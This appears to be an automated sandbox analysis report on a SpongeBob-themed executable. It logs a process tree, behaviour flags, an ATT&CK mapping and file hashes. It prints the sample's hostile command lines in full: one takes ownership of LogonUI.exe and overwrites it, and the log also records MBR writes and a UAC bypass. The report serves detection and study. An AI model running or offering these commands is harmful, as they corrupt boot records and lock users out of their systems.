C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --field-trial-handle=1036,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=8128 /prefetch:81⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_SpongeBobNoSleep2 (HorrorBob5).zip\SpongebobNoSleep2.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_SpongeBobNoSleep2 (HorrorBob5).zip\SpongebobNoSleep2.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exe"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\797D.tmp\798E.tmp\798F.vbs //Nologo2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\797D.tmp\mbr.exe"C:\Users\Admin\AppData\Local\Temp\797D.tmp\mbr.exe"3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\797D.tmp\tools.cmd" "3⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f4⤵
- Sets desktop wallpaper using registry
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters4⤵
-
C:\Users\Admin\AppData\Local\Temp\797D.tmp\MainWindow.exe"C:\Users\Admin\AppData\Local\Temp\797D.tmp\MainWindow.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\797D.tmp\gdifuncs.exe"C:\Users\Admin\AppData\Local\Temp\797D.tmp\gdifuncs.exe"3⤵
- Modifies WinLogon for persistence
- UAC bypass
- Disables RegEdit via registry modification
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
-
C:\windows\SysWOW64\takeown.exe"C:\windows\system32\takeown.exe" /f C:\windows\system32\LogonUI.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\windows\SysWOW64\icacls.exe"C:\windows\system32\icacls.exe" C:\\windows\\system32\\LogonUI.exe /granted "Admin":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd\&cd Windows\system32&takeown /f LogonUI.exe&icacls LogonUI.exe /granted "%username%":F&cd..&cd winbase_base_procid_none&cd secureloc0x65© "ui65.exe" "C:\windows\system32\LogonUI.exe" /Y&echo WinLTDRStartwinpos > "c:\windows\WinAttr.gci"&timeout 2&taskkill /f /im "tobi0a0c.exe"&exit4⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\takeown.exetakeown /f LogonUI.exe5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls LogonUI.exe /granted "Admin":F5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "tobi0a0c.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=6812,i,10925946972013221578,8820669985803190952,262144 --variations-seed-version --mojo-platform-channel-handle=6604 /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Pre-OS Boot
1Bootkit
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Abuse Elevation Control Mechanism
1Bypass User Account Control
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\797D.tmp\798E.tmp\798F.vbsFilesize
2KB
MD5b893c34dd666c3c4acef2e2974834a10
SHA12664e328e76c324fd53fb9f9cb64c24308472e82
SHA256984a07d5e914ed0b2487b5f6035d6e8d97a40c23fa847d5fbf87209fee4c4bbc
SHA51298a3413117e27c02c35322e17c83f529955b83e72f2af7caaaff53099b583cd241cec95e70c3c0d6d440cb22cf0109d4e46dfda09ef2480427e9a9ab7a4c866b
-
C:\Users\Admin\AppData\Local\Temp\797D.tmp\MainWindow.exeFilesize
92KB
MD57c92316762d584133b9cabf31ab6709b
SHA17ad040508cef1c0fa5edf45812b7b9cd16259474
SHA25601995c3715c30c0c292752448516b94485db51035c3a4f86eb18c147f10b6298
SHA512f9fc7600c30cb11079185841fb15ee3ba5c33fff13979d5e69b2bae5723a0404177195d2e0bd28142356ff9b293850880b28322b2ce1ff9fe35e8961bb3f7be1
-
C:\Users\Admin\AppData\Local\Temp\797D.tmp\bg.bmpFilesize
2.6MB
MD5ce45a70d3cc2941a147c09264fc1cda5
SHA144cdf6c6a9ab62766b47caed1a6f832a86ecb6f9
SHA256eceedadfde8506a73650cfa9a936e6a8fff7ffb664c9602bb14432aa2f8109ac
SHA512d1bf6cdade55e9a7ce4243e41a696ae051835711f3d1e0f273ad3643f0b878266a8213cc13ca887a8181981ba4937350986e01e819b4bb109330718ef6251149
-
C:\Users\Admin\AppData\Local\Temp\797D.tmp\gdifuncs.exeFilesize
120KB
MD5e254e9598ee638c01e5ccc40e604938b
SHA1541fa2a47f3caaae6aa8f5fbfe4d8aef0001905d
SHA2564040ad3437e51139819148ed6378828adcfbd924251af39de8bf100a3a476a63
SHA51292f129a52f2df1f8ed20156e838b79a13baf0cbcdd9c94a5c34f6639c714311f41eb3745fdcc64eac88ce3e6f27d25f9a3250f4ababc630eff7a89802e18b4bb
-
C:\Users\Admin\AppData\Local\Temp\797D.tmp\mainbgtheme.wavFilesize
19.0MB
MD51b185a156cfc1ddeff939bf62672516b
SHA1fd8b803400036f42c8d20ae491e2f1f040a1aed5
SHA256e147a3c7a333cbc90e1bf9c08955d191ce83f33542297121635c1d79ecfdfa36
SHA51241b33930e3efe628dae39083ef616baaf6ceb46056a94ab21b4b67eec490b0442a4211eaab79fce1f75f40ecdc853d269c82b5c5389081102f11e0f2f6503ae7
-
C:\Users\Admin\AppData\Local\Temp\797D.tmp\mbr.exeFilesize
1.3MB
MD533bd7d68378c2e3aa4e06a6a85879f63
SHA100914180e1add12a7f6d03de29c69ad6da67f081
SHA2566e79302d7ae9cc69e4fd1ba77bd4315d5e09f7a173b55ba823d6069a587a2e05
SHA512b100e43fb45a2c8b6d31dd92a8ae9d8efea88977a62118547b4609cc7fe0e42efc25dc043bac4b20f662fab044c0ba007b322c77e66f0c791cc906eafc72fb95
-
C:\Users\Admin\AppData\Local\Temp\797D.tmp\tools.cmdFilesize
2KB
MD5397c1a185b596e4d6a4a36c4bdcbd3b2
SHA1054819dae87cee9b1783b09940a52433b63f01ae
SHA25656c7054c00a849648d3681d08536dc56c0fb637f1f1ec3f9e102eace0a796a9f
SHA512c2a77479ca0aa945826dccea75d5a7224c85b7b415fda802301be8a2305197276a33c48f82717faddb2a0ac58300f5b849a8c0dffb5a4443663c3dfd951d4e5c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_8C44CCB290A14DAFA1FCD1EE59BADBFB.datFilesize
940B
MD551df6bd8fa551310c1258706b13c82d4
SHA19552f90469640ae2c8cbebe21c680f2927c8545d
SHA256a31500ab5d1664b0e7a6f31a97b5bdb7c173cd342d15107e5a7d9221f357b0c9
SHA51206e7b1dae9d4b311ca3fba2af6b792ec7947adcdeec10548626f04caeffac59a6c05925fc2886b7c6a450a4de0fe96666c34725959a914a9eb139a2e9d132189
-
C:\Users\Admin\Desktop\SPONGEBOB_IS_WATCHING_YOU 5.txtFilesize
26B
MD5bb6d68d7181108015cd381c28360dfc4
SHA1192c34b9cba6f9c4b742f2b70d9731b8ba2ac764
SHA256aea8fb9235900760ac374c6a4a10fba62c2a0ef5bea2dd7ef4db70fe55e0b317
SHA512e3d6bf8f6ae16daa235e2bc7ce64da5a76ff0155fa89942a4e9d3f10ce70229e081c5029a6b67702a6b14000f62e6c9188ba394ee7183d0667ddac9e0224f3f3
-
memory/524-221-0x0000000000400000-0x00000000004D8000-memory.dmpFilesize
864KB
-
memory/2408-236-0x0000000000120000-0x0000000000142000-memory.dmpFilesize
136KB
-
memory/2408-240-0x0000000004FE0000-0x0000000005584000-memory.dmpFilesize
5.6MB
-
memory/2408-241-0x0000000004B20000-0x0000000004BB2000-memory.dmpFilesize
584KB
-
memory/2408-242-0x0000000004DF0000-0x0000000004DFA000-memory.dmpFilesize
40KB